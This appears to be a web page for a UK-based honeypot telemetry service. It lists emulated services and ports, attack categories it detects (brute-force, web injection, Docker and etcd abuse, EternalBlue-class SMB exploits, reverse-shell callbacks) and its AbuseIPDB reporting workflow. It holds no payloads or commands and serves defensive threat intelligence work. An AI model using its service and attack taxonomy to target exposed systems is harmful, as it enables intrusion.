Security Telemetry // Community Intelligence

Community Reputation

This telemetry stack runs on BGP-announced address space in Wolverhampton, UK and emulates exposed production services at protocol level. It captures unsolicited abuse traffic, classifies attack intent, and feeds verified events into blocklist and community reporting workflows.

1,024Routable IPv4 listeners

~1,813IPv6 /48 equivalents

60+ TCPPlus UDP 69 and UDP 161

WolverhamptonOwn announced UK infrastructure

How It Works

The platform listens on 1,024 routable IPv4 addresses and approximately 1,813 IPv6 /48 equivalents using owned, announced infrastructure, not rented virtual machines. Unused routed space is announced specifically for telemetry, so unsolicited inbound traffic is treated as suspicious by default.

Collection: 60+ TCP services plus UDP 69 and UDP 161 are emulated with protocol-aware capture, not passive port probes.
Session detail: Authentication attempts, command payloads, headers, request paths, and protocol handshakes are retained for classification.
Classification: Events are grouped by attack category and severity using service context and payload behavior.
Suppression: Non-malicious internet measurement traffic is filtered from external abuse reporting.
Actioning: Verified abusive sources are promoted into production filtering and shared intelligence workflows.

Services Monitored

Emulation is protocol-aware rather than simple socket listening. The following service groups are actively monitored.

Remote Access and Auth

SSH (22/2222), Telnet (23), FTP (21), WinRM (5985/5986), RDP (3389), VNC (5900), LDAP/LDAPS (389/636), IMAP/IMAPS (143/993), POP3/POP3S (110/995), SMTP (25/465/587).

Web and Control APIs

HTTP/HTTPS (80/443/8080/8443) with full request logging, Docker API (2375/2376), Kubernetes API (6443), etcd (2379/2380), Jenkins (50000), Confluence (8090), WebLogic (7001), Consul (8500).

Datastores and Middleware

Redis (6379), Elasticsearch (9200), MongoDB (27017), MySQL (3306), MSSQL (1433), PostgreSQL (5432), Cassandra (9042), CouchDB (5984), Memcached (11211).

IoT and Embedded Protocols

RTSP (554/8554) camera emulation, SIP/VoIP (5060), MQTT (1883), CWMP/TR-069 (7547), TFTP UDP (69), SNMP UDP (161), ADB (5555), plus exploit probes aligned with HG532/UPnP families.

File and Network Services

rsync (873), SMB/CIFS (445), Oracle TNS (1521), and infrastructure probes touching Prometheus (9090), Grafana (3000), and Hadoop NameNode (50070).

Attack Categories Detected

Events are tagged by attack class and severity using service context and payload characteristics.

Credential Brute-Force

Repeated auth attempts across SSH, FTP, Telnet, IMAP, POP3, LDAP, RDP, and VNC. Example: multi-service username/password spray.

Web Exploitation

SQL injection, command injection, path traversal, and PHP eval-style payloads. Example: exploit strings in HTTP path/query/body data.

Database Enumeration

Unauthenticated probing and data-access attempts against Redis, MongoDB, Elasticsearch, and CouchDB.

Container and Cloud Abuse

Docker API remote execution patterns, etcd configuration theft behavior, and Kubernetes API reconnaissance.

IoT Exploitation

RTSP camera auth attacks, CWMP router probing, MQTT broker checks, and TFTP firmware/config request patterns.

Network Exploitation

SMB negotiate/exploit traffic aligned with EternalBlue-class tooling and rsync service enumeration.

Amplification Staging

Service checks against Memcached, SNMP, and TFTP commonly used in reflection or amplification workflows.

C2 and Callback Activity

Reverse-shell callback attempts and command-and-control check-ins, including common listener patterns such as 4444.

Scanner Exclusion

Abuse reporting is gated by a suppression pipeline that removes legitimate internet measurement and research traffic before any external submission.

Inbound activity is normalised and de-duplicated to remove repeated noise.

Traffic is evaluated with internal vetting signals to separate broad survey traffic from targeted abuse.

Research scanner events remain in local telemetry only and are excluded from AbuseIPDB submissions.

AbuseIPDB Reporting

Confirmed abuse events are reported to AbuseIPDB with structured context including attacked service, attack method, network attribution, and a short proof snippet. Example report comments include entries such as SSH authentication brute-force, SMB/CIFS exploit attempt, Docker API unauthenticated exploit attempt, and etcd/Kubernetes configuration store theft behavior.

Reports are rate-limited per source to avoid duplicate spam and maintain signal quality.

Comment format examples:

SSH authentication brute-force
SMB/CIFS exploit attempt (EternalBlue-class)
Docker API unauthenticated exploit attempt
etcd/Kubernetes configuration store theft behavior

Contributor profile: abuseipdb.com/user/121600

Live Telemetry Snapshot

Your browser polls hp-dash.aaran.cloud/api/stats directly and refreshes this panel every 30 seconds.

Loading live data... Awaiting first response

Total Hits

Unique IPs

Total Reported

Scanners Suppressed

Hits Last Hour

Hits Last 24h

Top Attack Types

Top Ports

Top Countries

Live Honeypot Dashboard

Public access is available for live telemetry review, including the real-time 2D world attack map, live event feed, top attacking sources, and protocol/attack breakdown views.

Live world map Event stream Top attacking IPs Protocol breakdown Severity split

Open the live map at hp-dash.aaran.cloud.

Why This Matters

The objective is practical, production-ready reputation intelligence: reducing abusive traffic exposure, improving response speed, and helping keep shared infrastructure ecosystems cleaner for everyone involved.

For collaboration or private feed discussion, use hello@aaran.cloud.